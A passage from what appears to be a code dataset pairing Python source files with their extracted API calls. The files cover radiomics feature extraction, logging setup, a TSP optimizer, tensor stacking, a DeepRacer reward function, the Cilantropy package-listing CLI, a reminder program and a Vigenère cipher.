url_for\n'), ((23031, 23050), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (23041, 23050), False, 'import json\n')]
|
import argparse
import os
import sys
import radiomics
import SimpleITK as sitk
import csv
import pandas as pd
LABELS_FS = ['Left-Lateral-Ventricle', 'Left-Inf-Lat-Vent', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', '3rd-Ventricle',
'4th-Ventricle', 'Brain-Stem', 'Left-Hippocampus', 'Left-Amygdala', 'Left-Accumbens-area', 'Left-VentralDC', 'Left-choroid-plexus',
'Right-Lateral-Ventricle', 'Right-Inf-Lat-Vent', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen', 'Right-Pallidum', 'Right-Hippocampus',
'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Right-choroid-plexus', '5th-Ventricle',
'CC_Posterior', 'CC_Mid_Posterior', 'CC_Central', 'CC_Mid_Anterior', 'CC_Anterior']
LABELS_DL = ['Left-Ventricle-all:101', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', 'Left-Hippocampus', 'Left-Amygdala',
'Left-Accumbens-area', 'Left-VentralDC', 'Right-Ventricle-all:112', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen',
'Right-Pallidum', 'Right-Hippocampus', 'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Brain-Stem',
'3rd-Ventricle', '4th-Ventricle', 'Corpus-Callosum:125']
def lut_parse():
lut = pd.read_csv('{}/fs_lut.csv'.format(os.path.dirname(os.path.realpath(sys.argv[0]))))
lut = dict(zip(lut.Key, lut.Label))
return lut
def main(subject_dirs, aseg_file, labels, results_csv):
LUT = lut_parse()
print(results_csv)
with open(results_csv, 'w') as out_file:
writer = csv.writer(out_file, delimiter=',')
header = None
for subjects_dir in subject_dirs:
for subject_name in os.listdir(subjects_dir):
fname = '{}/{}/{}'.format(subjects_dir, subject_name, aseg_file)
if not os.path.exists(fname):
print('{}: {} not found. Skipping'.format(subject_name, aseg_file))
continue
print(subject_name)
fields = list()
values = list()
img = sitk.ReadImage(fname)
for label in labels:
if ':' in label:
label, label_id = label.split(':')
else:
label_id = LUT[label]
radiomics.setVerbosity(50)
shape_features = radiomics.shape.RadiomicsShape(img, img, **{'label': int(label_id)})
shape_features.enableAllFeatures()
results = shape_features.execute()
for key in results.keys():
fields.append('{}.{}'.format(label, key))
values.append(float(results[key]) if results['VoxelVolume'] > 0 else 'nan')
if header is None:
header = fields
writer.writerow(['Subject'] + header)
else:
assert header == fields
writer.writerow([subject_name] + values)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Extract radiomics features from subjects')
parser.add_argument(
'--aseg_file',
type=str,
default='T1w_norm_seg.nii.gz',
help='Path (relative to subject dir) of aseg segmentation file.'
)
parser.add_argument(
'--labels',
type=str,
nargs='+',
metavar='label',
default=['DL'],
help='List of labels. FreeSurfer ids (from fs_lut) are used per default. '
'Can also be: label:id. Example: "Left-Hippocampus:9 Right-Hippocampus:21." '
'Use "FS" for all FreeSurfer labels or "DL" for all DL+DiReCT labels'
)
parser.add_argument(
'--results_csv',
type=str,
required=True,
help='CSV-File to store results'
)
parser.add_argument(
'subject_dirs',
metavar='dir',
type=str,
nargs='+',
help='Directories with subjects (FreeSurfer or DL+DiReCT results dir)'
)
args = parser.parse_args()
for dir in args.subject_dirs:
if not os.path.exists(dir):
print('{} not found'.format(args.subjects_dir))
sys.exit(1)
labels = LABELS_FS if args.labels[0] == 'FS' else LABELS_DL if args.labels[0] == 'DL' else args.labels
main(args.subject_dirs, args.aseg_file, labels, args.results_csv)
|
[
"radiomics.setVerbosity",
"csv.writer",
"argparse.ArgumentParser",
"os.path.realpath",
"SimpleITK.ReadImage",
"os.path.exists",
"os.listdir",
"sys.exit"
] |
[((3124, 3203), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Extract radiomics features from subjects"""'}), "(description='Extract radiomics features from subjects')\n", (3147, 3203), False, 'import argparse\n'), ((1600, 1635), 'csv.writer', 'csv.writer', (['out_file'], {'delimiter': '""","""'}), "(out_file, delimiter=',')\n", (1610, 1635), False, 'import csv\n'), ((1732, 1756), 'os.listdir', 'os.listdir', (['subjects_dir'], {}), '(subjects_dir)\n', (1742, 1756), False, 'import os\n'), ((4199, 4218), 'os.path.exists', 'os.path.exists', (['dir'], {}), '(dir)\n', (4213, 4218), False, 'import os\n'), ((4292, 4303), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4300, 4303), False, 'import sys\n'), ((1346, 1375), 'os.path.realpath', 'os.path.realpath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (1362, 1375), False, 'import os\n'), ((2125, 2146), 'SimpleITK.ReadImage', 'sitk.ReadImage', (['fname'], {}), '(fname)\n', (2139, 2146), True, 'import SimpleITK as sitk\n'), ((1862, 1883), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (1876, 1883), False, 'import os\n'), ((2372, 2398), 'radiomics.setVerbosity', 'radiomics.setVerbosity', (['(50)'], {}), '(50)\n', (2394, 2398), False, 'import radiomics\n')]
|
from pythonjsonlogger import jsonlogger
from datetime import datetime
import logging
from logging import Logger
from logging.config import dictConfig
from seedwork.utils.functional import SimpleLazyObject
from seedwork.infrastructure.request_context import request_context
class RequestContextFilter(logging.Filter):
""" "Provides correlation id parameter for the logger"""
def __init__(self, name: str, request_context) -> None:
super().__init__(name=name)
self.request_context = request_context
def filter(self, record):
record.correlation_id = self.request_context.correlation_id.get()
return True
class ElkJsonFormatter(jsonlogger.JsonFormatter):
"""
ELK stack-compatibile formatter
"""
def add_fields(self, log_record, record, message_dict):
super(ElkJsonFormatter, self).add_fields(log_record, record, message_dict)
log_record["@timestamp"] = datetime.now().isoformat()
log_record["level"] = record.levelname
log_record["logger"] = record.name
class LoggerFactory:
_configured = False
@classmethod
def configure(
cls,
logger_name="app",
log_filename="./logs.json",
request_context=request_context,
):
cls.logger_name = logger_name
cls.log_filename = log_filename
cls.request_context = request_context
cls._configured = True
@classmethod
def create_logger(cls):
"""
Returns a logger instance, based on a configuration options
"""
if not cls._configured:
cls.configure()
logging_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"default": {
# exact format is not important, this is the minimum information
"format": "%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
},
"colored": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
"log_colors": {
"DEBUG": "white",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red,bold",
},
},
"colored_db": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
"log_colors": {
"DEBUG": "purple",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red,bold",
},
},
"json_formatter": {
"()": "seedwork.infrastructure.logging.ElkJsonFormatter",
},
},
"handlers": {
# console logs to stderr
"console": {
"class": "logging.StreamHandler",
"formatter": "default",
},
"colored_console": {
"class": "colorlog.StreamHandler",
"formatter": "colored",
},
"colored_console_db": {
"class": "colorlog.StreamHandler",
"formatter": "colored_db",
},
"file_handler": {
"class": "logging.handlers.RotatingFileHandler",
"filename": cls.log_filename,
"formatter": "json_formatter",
}
if cls.log_filename
else None,
# Add Handler for Sentry for `warning` and above
# 'sentry': {
# 'level': 'WARNING',
# 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
# },
},
"loggers": {
cls.logger_name: {
"level": "DEBUG",
"handlers": ["colored_console", "file_handler"], # , 'sentry'],
},
# Prevent noisy modules from logging to Sentry
"noisy_module": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
},
}
dictConfig(logging_config)
logger = logging.getLogger(name=cls.logger_name)
logger.addFilter(
RequestContextFilter(
name=cls.logger_name, request_context=cls.request_context
)
)
return logger
"""
We are making logger globally available, but to make it configurable logger lazy-evaluated.
Use `LoggerFactory.configure()` to configure the logger prior to its usage
"""
logger = SimpleLazyObject(LoggerFactory.create_logger)
|
[
"datetime.datetime.now",
"logging.config.dictConfig",
"logging.getLogger",
"seedwork.utils.functional.SimpleLazyObject"
] |
[((5120, 5165), 'seedwork.utils.functional.SimpleLazyObject', 'SimpleLazyObject', (['LoggerFactory.create_logger'], {}), '(LoggerFactory.create_logger)\n', (5136, 5165), False, 'from seedwork.utils.functional import SimpleLazyObject\n'), ((4670, 4696), 'logging.config.dictConfig', 'dictConfig', (['logging_config'], {}), '(logging_config)\n', (4680, 4696), False, 'from logging.config import dictConfig\n'), ((4714, 4753), 'logging.getLogger', 'logging.getLogger', ([], {'name': 'cls.logger_name'}), '(name=cls.logger_name)\n', (4731, 4753), False, 'import logging\n'), ((932, 946), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (944, 946), False, 'from datetime import datetime\n')]
|
import math
import random
import numpy
from tools import *
'''
Parametric Optimizers to search for optimal TSP solution.
Method 1: Stochastic Hill Climbing search
Method 2: Random Search - Used as benchmark
'''
# Initialize the population, a collection of paths
def createPath(m):
n = numpy.arange(1,m+1)
numpy.random.shuffle(n)
return n
# Perform a stochastic hill climbing search
def stochClimb(points,bound,inter):
p = len(points)
# ctr for fitness func. eval.
ctr = 0
# data taken at each i in inter
data = []
# best seen so far
maxfit = 0.0
while (ctr < bound):
# Path
v = createPath(p)
f = fitnessShort(v,points)
if (f > maxfit):
maxfit = f
ctr += 1
if (ctr in inter):
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# Create swap indices
o = numpy.arange(v.size)
i = numpy.arange(v.size)
while (ctr < bound):
climbed = False
numpy.random.shuffle(o)
numpy.random.shuffle(i)
for x in range(o.size):
for y in range(i.size):
swap(v,o[x],i[y])
shot = fitnessShort(v,points)
ctr += 1
if (shot <= f):
swap(v,o[x],i[y])
else:
f = shot
climbed = True
if (ctr in inter):
if (shot > maxfit):
maxfit = shot
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# If no improvement made, local optimum reached
# Return solution, otherwise keep trying to climb
if (not climbed):
break
else:
if (f > maxfit):
maxfit = f
# Perform a random search, used primarily for benchmarking
def randSearch(points,bound,inter):
p = len(points)
scores = []
best = 0.0
for x in range(1,bound+1):
z = createPath(p)
s = fitnessShort(z,points)
if (s > best):
best = s
if (x in inter):
scores.append(1.0/best)
return scores
|
[
"numpy.arange",
"numpy.random.shuffle"
] |
[((290, 312), 'numpy.arange', 'numpy.arange', (['(1)', '(m + 1)'], {}), '(1, m + 1)\n', (302, 312), False, 'import numpy\n'), ((312, 335), 'numpy.random.shuffle', 'numpy.random.shuffle', (['n'], {}), '(n)\n', (332, 335), False, 'import numpy\n'), ((840, 860), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (852, 860), False, 'import numpy\n'), ((869, 889), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (881, 889), False, 'import numpy\n'), ((943, 966), 'numpy.random.shuffle', 'numpy.random.shuffle', (['o'], {}), '(o)\n', (963, 966), False, 'import numpy\n'), ((973, 996), 'numpy.random.shuffle', 'numpy.random.shuffle', (['i'], {}), '(i)\n', (993, 996), False, 'import numpy\n')]
|
from typing import Dict, List, Optional, Union
import torch
from ..torch_utils import padded_stack
def stack_arrays_as_dict(
batch: List[Optional[torch.Tensor]], pad: bool = True
) -> Optional[
Union[
torch.Tensor,
Dict[str, Union[Optional[torch.Tensor], Optional[List[Optional[torch.Tensor]]]]],
List[Optional[torch.Tensor]],
]
]:
"""Stack a list of optional tensors into either a single tensor or a set of ragged tensors.
NOTE: Should be used within the collate function, otherwise "__root__" doesn't really make sense.
Args:
batch (List[Optional[torch.Tensor]]): The batch of tensors to stack.
pad (bool, optional): If the tensors should be stacked as a ragged set, or as a single tensor. Defaults to True.
Returns:
Optional[ Union[
torch.Tensor,
Dict[str, Union[Optional[torch.Tensor],Optional[List[Optional[torch.Tensor]]]]],
List[Optional[torch.Tensor]], ] ]: The stacked/ragged tensors
"""
# If the input shape is the same for every element in the batch, stack the arrays, else pad the arrays to the
# same shape.
proto_s = [b for b in batch if b is not None]
if not proto_s:
return [None] * len(batch)
proto = proto_s[0]
if all([x is None or x.shape == proto.shape for x in batch]):
if pad:
return {
"__root__": torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0),
"seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch]),
}
return torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0)
if all([x is None or x.shape[1:] == proto.shape[1:] for x in batch]):
if pad:
# Pad the first axis, and return sequence lengths
tensors = [x if x is not None else torch.zeros(*proto.shape[1:]).to(proto.dtype) for x in batch]
d, s = padded_stack(tensors)
return {"__root__": d, "seqlen": s}
# TODO: Correct the return types on this data
if pad:
return {"__root__": batch, "seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch])}
return batch
|
[
"torch.zeros",
"torch.zeros_like",
"torch.tensor"
] |
[((2175, 2242), 'torch.tensor', 'torch.tensor', (['[(x.shape[0] if x is not None else 0) for x in batch]'], {}), '([(x.shape[0] if x is not None else 0) for x in batch])\n', (2187, 2242), False, 'import torch\n'), ((1530, 1597), 'torch.tensor', 'torch.tensor', (['[(x.shape[0] if x is not None else 0) for x in batch]'], {}), '([(x.shape[0] if x is not None else 0) for x in batch])\n', (1542, 1597), False, 'import torch\n'), ((1663, 1691), 'torch.zeros_like', 'torch.zeros_like', (['proto_s[0]'], {}), '(proto_s[0])\n', (1679, 1691), False, 'import torch\n'), ((1450, 1478), 'torch.zeros_like', 'torch.zeros_like', (['proto_s[0]'], {}), '(proto_s[0])\n', (1466, 1478), False, 'import torch\n'), ((1916, 1945), 'torch.zeros', 'torch.zeros', (['*proto.shape[1:]'], {}), '(*proto.shape[1:])\n', (1927, 1945), False, 'import torch\n')]
|
#!/usr/bin/python3
import math
def is_prime2(n: int) -> bool:
if n >= 2:
for i in range(2, n):
if not (n % i):
return False
else:
return False
return True
def prime_factors(n: int) -> []:
primes = []
for i in range(1, math.floor(math.sqrt(n)) + 1):
if n % i == 0:
if is_prime2(i):
primes.insert(0, i)
if is_prime2(n):
primes.append(i)
return primes
def solve(n: int) -> (int):
return prime_factors(n)[0]
if __name__ == '__main__':
print(solve(600851475143))
|
[
"math.sqrt"
] |
[((294, 306), 'math.sqrt', 'math.sqrt', (['n'], {}), '(n)\n', (303, 306), False, 'import math\n')]
|
def reward_function(params):
'''
Cosine reward function for heading angle
'''
# Import libraries
import math
# PARAMETERS (CONSTANTS)
# Total num of steps we want the car to finish the lap, it will vary depends on the track length
TOTAL_NUM_STEPS = 300
# Max angle threshold (degrees). Heading direction of the car in regards to the track (closest waypoints).
COS_THRESHOLD = 0.1213
# Max speed
MAX_SPEED = 12.1
# Max steering angle (degree)
MAX_STEERING = 30.1
# Read input parameters
distance_from_center = params['distance_from_center']
track_width = params['track_width']
steering_abs = abs(params['steering_angle']) # Only need the absolute steering angle (max: 30, min -30)
speed = params['speed']
steps = params['steps']
progress = params['progress']
all_wheels_on_track = params['all_wheels_on_track']
waypoints = params['waypoints']
closest_waypoints = params['closest_waypoints']
heading = params['heading']
# Calculate 3 markers that are at varying distances away from the center line
marker_1 = 0.1 * track_width
marker_2 = 0.25 * track_width
marker_3 = 0.5 * track_width
# Give higher reward if the agent is closer to center line and vice versa
if distance_from_center <= marker_1:
reward = 1
elif distance_from_center <= marker_2:
reward = 0.5
elif distance_from_center <= marker_3:
reward = 0.1
else:
reward = 1e-3 # likely crashed/ close to off track
# Calculate the direction of the center line based on the closest waypoints
next_point = waypoints[closest_waypoints[1]]
prev_point = waypoints[closest_waypoints[0]]
# Calculate the direction in radius, arctan2(dy, dx), the result is (-pi, pi) in radians
track_angle = math.atan2(next_point[1] - prev_point[1], next_point[0] - prev_point[0])
# Convert to degree
track_angle = math.degrees(track_angle)
# Calculate negative cosine
cos_value = math.cos(math.radians(heading + track_angle)) * 3.0 - 2.0 # cos * 3 - 2 (0.1 -> 1)
#print('Track angle: {0}, Heading angle: {1}, Cos: {2}'.format(track_angle, heading, cos_value))
# Penalize the reward if the heading angle is too large
if cos_value < COS_THRESHOLD:
reward *= 0.01
else:
reward *= cos_value
# Give additional reward if the car pass every 100 steps faster than expected
if (steps % 100) == 0 and progress > (steps / TOTAL_NUM_STEPS) * 100 :
reward += progress/100.0
# Penalize if the car goes off track
if not all_wheels_on_track:
reward = 1e-3
return float(reward)
# Test function
print(reward_function({
'distance_from_center': 0
,'track_width': 10
,'steering_angle': 0
,'speed': 1
,'steps': 0
,'progress': 0
,'all_wheels_on_track': True
,'waypoints':[(100,100),(150,100)]
,'closest_waypoints':[0,1]
,'heading': 0
}))
|
[
"math.radians",
"math.degrees",
"math.atan2"
] |
[((1884, 1956), 'math.atan2', 'math.atan2', (['(next_point[1] - prev_point[1])', '(next_point[0] - prev_point[0])'], {}), '(next_point[1] - prev_point[1], next_point[0] - prev_point[0])\n', (1894, 1956), False, 'import math\n'), ((2002, 2027), 'math.degrees', 'math.degrees', (['track_angle'], {}), '(track_angle)\n', (2014, 2027), False, 'import math\n'), ((2087, 2122), 'math.radians', 'math.radians', (['(heading + track_angle)'], {}), '(heading + track_angle)\n', (2099, 2122), False, 'import math\n')]
|
"""
.. module:: console
:platform: Unix, Windows
:synopsis: Cilantropy entry-point for console commands
:mod:`console` -- Cilantropy entry-point for console commands
==================================================================
"""
from .helpers import get_shared_data
from .helpers import get_pkg_res
from .helpers import get_pypi_search
from .helpers import get_pypi_releases
from .helpers import parse_dict
from .helpers import get_kv_colored
from .helpers import get_field_formatted
from .helpers import create_paste_template
from . import metadata
from .settings import __version__
from .settings import __author__
from .settings import __author_url__
from .settings import TEKNIK_PASTE_API
from flask import json
from docopt import docopt
import urllib
import urllib.request
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
import pkg_resources
def cmd_show(args, short=False):
"""This function implements the package show command.
:param args: the docopt parsed arguments
"""
proj_name = args["<project_name>"]
try:
pkg_dist = get_pkg_res().get_distribution(proj_name)
except:
print(
Fore.RED + Style.BRIGHT
) + "Error: unable to locate the project '%s' !" % proj_name
raise RuntimeError("Project not found !")
try:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
except FileNotFoundError:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
except FileNotFoundError:
pass
parsed, key_known = metadata.parse_metadata(pkg_metadata)
distinfo = metadata.metadata_to_dict(parsed, key_known)
proj_head = Fore.GREEN + Style.BRIGHT + pkg_dist.project_name
proj_head += Fore.YELLOW + Style.BRIGHT + " " + pkg_dist.version
print(proj_head),
proj_sum = Fore.WHITE + Style.DIM
proj_sum += "- " + parse_dict(distinfo, "summary", True)
print(proj_sum)
# Remove long fields and used fields
if "description" in distinfo:
del distinfo["description"]
if "summary" in distinfo:
del distinfo["summary"]
if "name" in distinfo:
del distinfo["name"]
if "version" in distinfo:
del distinfo["version"]
classifier = None
if "classifier" in distinfo:
classifier = distinfo["classifier"]
del distinfo["classifier"]
for key in distinfo:
print(get_field_formatted(distinfo, key))
if short:
return
print()
print(get_kv_colored("location", pkg_dist.location))
requires = pkg_dist.requires()
if len(requires) == 0:
print(get_kv_colored("requires", "none"))
else:
req_text = "\n"
for req in requires:
req_text += " " * 4 + str(req) + "\n"
print(get_kv_colored("requires", req_text))
entry_points = pkg_dist.get_entry_map()
console_scripts = entry_points.get("console_scripts")
if console_scripts:
console_scr_text = Fore.WHITE + Style.BRIGHT + " Console Scripts:" + "\n"
for name, entry in console_scripts.items():
console_scr_text += (
Fore.YELLOW + Style.BRIGHT + " " * 4 + name + Fore.WHITE + Style.BRIGHT
)
console_scr_text += (
" -> "
+ Fore.GREEN
+ Style.BRIGHT
+ entry.module_name
+ ":"
+ ",".join(entry.attrs)
+ "\n"
)
print(console_scr_text)
if classifier:
distinfo["classifier"] = classifier
print(get_field_formatted(distinfo, "classifier"))
def cmd_list_detail(dist, distinfo):
proj_head = Fore.GREEN + Style.BRIGHT + dist.project_name
proj_head += Fore.YELLOW + Style.BRIGHT + " " + dist.version
print(proj_head)
proj_sum = Fore.WHITE + Style.DIM
proj_sum += "- " + parse_dict(distinfo, "summary", True)
print(proj_sum)
print(get_field_formatted(distinfo, "Author"))
author_email = distinfo.get("author-email")
if author_email:
print("<%s>" % author_email)
else:
print()
print(get_field_formatted(distinfo, "Home-page"))
print(get_field_formatted(distinfo, "License"))
print(get_field_formatted(distinfo, "Platform"))
def cmd_list_compact(dist, distinfo):
proj_head = Fore.GREEN + Style.BRIGHT + dist.project_name.ljust(25)
proj_head += Fore.WHITE + Style.BRIGHT + " " + dist.version.ljust(12)
print(proj_head, end="")
proj_sum = Fore.WHITE + Style.DIM
proj_sum += " " + parse_dict(distinfo, "summary", True)
print(proj_sum.ljust(100))
def cmd_list(args):
"""This function implements the package list command.
:param args: the docopt parsed arguments
"""
compact = args["--compact"]
filt = args["<filter>"]
distributions = get_shared_data()["distributions"]
if compact:
print(
Fore.YELLOW
+ Style.BRIGHT
+ "Project Name".ljust(26)
+ "Version".ljust(14)
+ "Summary"
)
print("-" * 80)
for dist in distributions:
if filt:
if filt.lower() not in dist.project_name.lower():
continue
pkg_dist = get_pkg_res().get_distribution(dist.key)
try:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
except FileNotFoundError:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
except FileNotFoundError:
pass
parsed, key_known = metadata.parse_metadata(pkg_metadata)
distinfo = metadata.metadata_to_dict(parsed, key_known)
if compact:
cmd_list_compact(dist, distinfo)
else:
cmd_list_detail(dist, distinfo)
def cmd_check(args):
proj_name = args["<project_name>"]
cmd_show(args, short=True)
print()
print(Fore.GREEN + Style.BRIGHT + "Searching for updates on PyPI...")
print()
pkg_dist_version = get_pkg_res().get_distribution(proj_name).version
pypi_rel = get_pypi_releases(proj_name)
if pypi_rel:
pypi_last_version = get_pkg_res().parse_version(pypi_rel[0])
current_version = get_pkg_res().parse_version(pkg_dist_version)
try:
version_index = pypi_rel.index(pkg_dist_version)
except:
version_index = len(pypi_rel)
for version in pypi_rel[0 : version_index + 3]:
print(Fore.WHITE + Style.BRIGHT + " Version %s" % version, end=" ")
if version == pypi_rel[0]:
print(Fore.BLUE + Style.BRIGHT + "[last version]", end=" ")
if version == pkg_dist_version:
print(Fore.GREEN + Style.BRIGHT + "[your version]", end="")
print()
print()
if pypi_last_version > current_version:
print(
Fore.RED
+ Style.BRIGHT
+ " Your version is outdated, you're using "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s," % pkg_dist_version
+ Fore.RED
+ Style.BRIGHT
+ " but the last version is "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s !" % pypi_rel[0]
)
if pypi_last_version == current_version:
print(Fore.GREEN + Style.BRIGHT + " Your version is updated !")
if pypi_last_version < current_version:
print(
Fore.YELLOW
+ Style.BRIGHT
+ " Your version newer than the version available at PyPI !"
)
print(
Fore.YELLOW
+ Style.BRIGHT
+ " You're using "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s," % pkg_dist_version
+ Fore.YELLOW
+ Style.BRIGHT
+ " but the last version in PyPI "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s !" % pypi_rel[0]
)
else:
print("No versions found on PyPI !")
def cmd_scripts(args):
filt = args["<filter>"]
print(
Fore.YELLOW
+ Style.BRIGHT
+ "Script Name".ljust(23)
+ "Project Name".ljust(21)
+ "Module Name"
)
print("-" * 80)
for entry in pkg_resources.iter_entry_points("console_scripts"):
if filt:
if filt.lower() not in entry.name.lower():
continue
print(Fore.GREEN + Style.BRIGHT + entry.name.ljust(22), end="")
print(Fore.WHITE + Style.NORMAL + str(entry.dist).ljust(20), end="")
print(Fore.BLUE + Style.BRIGHT + entry.module_name, end="")
print(Fore.BLUE + Style.NORMAL + "(" + entry.attrs[0] + ")", end="\n")
def cmd_paste(args):
template_data = create_paste_template()
data = urllib.parse.urlencode({"code": template_data})
res = urllib.request.urlopen(TEKNIK_PASTE_API, bytes(data, encoding="utf-8"))
result = json.loads(res.read().decode("utf-8"))
if "result" in result:
print(
Fore.GREEN + Style.BRIGHT + "Paste url: {}".format(result["result"]["url"])
)
else:
print(Fore.RED + Style.BRIGHT + "ERROR PASTE!")
def run_main():
"""Cilantropy - Python List Packages (PLP)
Usage:
plp list [--compact] [<filter>]
plp show <project_name>
plp check <project_name>
plp scripts [<filter>]
plp paste [list your packages to pastebin service]
plp (-h | --help)
plp --version
Options:
--compact Compact list format
-h --help Show this screen.
--version Show version.
"""
init(autoreset=True)
arguments = docopt(
run_main.__doc__,
version="Cilantropy v.%s - Python List Packages (PLP)" % __version__,
)
if arguments["list"]:
cmd_list(arguments)
if arguments["show"]:
cmd_show(arguments)
if arguments["check"]:
cmd_check(arguments)
if arguments["scripts"]:
cmd_scripts(arguments)
if arguments["paste"]:
cmd_paste(arguments)
if __name__ == "__main__":
run_main()
|
[
"colorama.init",
"pkg_resources.iter_entry_points",
"urllib.parse.urlencode",
"docopt.docopt"
] |
[((8458, 8508), 'pkg_resources.iter_entry_points', 'pkg_resources.iter_entry_points', (['"""console_scripts"""'], {}), "('console_scripts')\n", (8489, 8508), False, 'import pkg_resources\n'), ((8983, 9030), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'code': template_data}"], {}), "({'code': template_data})\n", (9005, 9030), False, 'import urllib\n'), ((9817, 9837), 'colorama.init', 'init', ([], {'autoreset': '(True)'}), '(autoreset=True)\n', (9821, 9837), False, 'from colorama import init\n'), ((9855, 9954), 'docopt.docopt', 'docopt', (['run_main.__doc__'], {'version': "('Cilantropy v.%s - Python List Packages (PLP)' % __version__)"}), "(run_main.__doc__, version=\n 'Cilantropy v.%s - Python List Packages (PLP)' % __version__)\n", (9861, 9954), False, 'from docopt import docopt\n')]
|
#programa de recordatorios
import pickle
import os
#crea lista vacia en un archivo llamada outfile con pickle si no exite uno
#de lo contrario abre el creado previamente
if os.path.isfile('./outfile') == False:
recordatorios = []
with open('outfile', 'wb') as fp:
pickle.dump(recordatorios, fp)
else:
with open ('outfile', 'rb') as fp:
recordatorios = pickle.load(fp)
#opciones para elejir
print('Opciones:')
print('\
1 - Ver recordatorios\n\
2 - Agregar items\n\
3 - Quitar items\n\
4 - Salir\
')
#muestra la lista en forma vertical y numera los items
def mostrar_items(lista):
print("Recordatorios:")
for lugar,line in enumerate(lista):
print(" ",lugar + 1,'-' , line)
#funcion main con codigo de las oredenes
def main():
ordenes = int(input('Que queres hacer?... '))
if ordenes == 1:
if recordatorios == []:
print("No tenes recordatorios.")
main()
else:
mostrar_items(recordatorios)
main()
elif ordenes == 2:
agregar_recordar = input('Ingresa de lo que queres que te recuerde... ')
recordatorios.append(agregar_recordar.capitalize())
mostrar_items(recordatorios)
main()
elif ordenes == 3:
mostrar_items(recordatorios)
item = int(input('Ingresa el numero de item a eliminar: '))
del recordatorios[item - 1]
mostrar_items(recordatorios)
main()
elif ordenes == 4:
with open('outfile', 'wb') as fp:
pickle.dump(recordatorios, fp)
quit('Adios!')
else:
print('Error, intenta de nuevo.')
main()
main()
|
[
"os.path.isfile",
"pickle.load",
"pickle.dump"
] |
[((174, 201), 'os.path.isfile', 'os.path.isfile', (['"""./outfile"""'], {}), "('./outfile')\n", (188, 201), False, 'import os\n'), ((281, 311), 'pickle.dump', 'pickle.dump', (['recordatorios', 'fp'], {}), '(recordatorios, fp)\n', (292, 311), False, 'import pickle\n'), ((381, 396), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (392, 396), False, 'import pickle\n'), ((1543, 1573), 'pickle.dump', 'pickle.dump', (['recordatorios', 'fp'], {}), '(recordatorios, fp)\n', (1554, 1573), False, 'import pickle\n')]
|
from tkinter import *
from tkinter import messagebox, colorchooser
from logging import basicConfig, warning, info, error, DEBUG
from os import getcwd, path, mkdir
from time import strftime, time, localtime
from json import dump, load
from re import findall, search
from hmac import new, compare_digest
from hashlib import sha224, sha512
from secrets import choice
from string import ascii_letters
from requests import get
from smtplib import SMTP, SMTPRecipientsRefused
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class Vigenere:
def __init__(self):
self.letter_list = 'A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'.split(' ')
self.number_list = list(range(26))
def encipher(self, msg, secret_key):
self.pattern_list = findall(r'[\s]|[0123456789]|[~`!@#\$%\^&\*()_\+\-={}|\[\]\\:";\'\<\>\?,./", ]', msg)
msg = msg.upper()
for x in self.pattern_list:
msg = msg.replace(x, '')
self.secret_key = secret_key.upper()
while True:
if len(self.secret_key) < len(msg):
self.secret_key *= 2
else:
self.secret_key = self.secret_key[:len(msg)].upper()
break
self.encipher_text_list1 = [x for x in list(msg)]
self.encipher_text_list2 = [x for x in list(self.secret_key)]
self.encipher_text_list = []
for x in range(len(msg)):
self.encipher_text_list += [[self.encipher_text_list1[x], self.encipher_text_list2[x]]]
self.output_list = []
for x in range(len(msg)):
self.num_msg = self.number_list[self.letter_list.index(self.encipher_text_list[x][0])]
self.num_key = self.number_list[self.letter_list.index(self.encipher_text_list[x][1])]
self.new_letter_list = self.letter_list[self.number_list[self.num_msg]:] + list(self.letter_list[0:self.number_list[self.num_msg]])
self.output_list += self.new_letter_list[self.num_key]
self.output = ''
for x in self.output_list:
self.output += x
return self.output
def decipher(self, msg, secret_key):
self.pattern_list = findall(r'[\s]|[0123456789]|[~`!@#\$%\^&\*()_\+\-={}|\[\]\\:";\'\<\>\?,./", ]', msg)
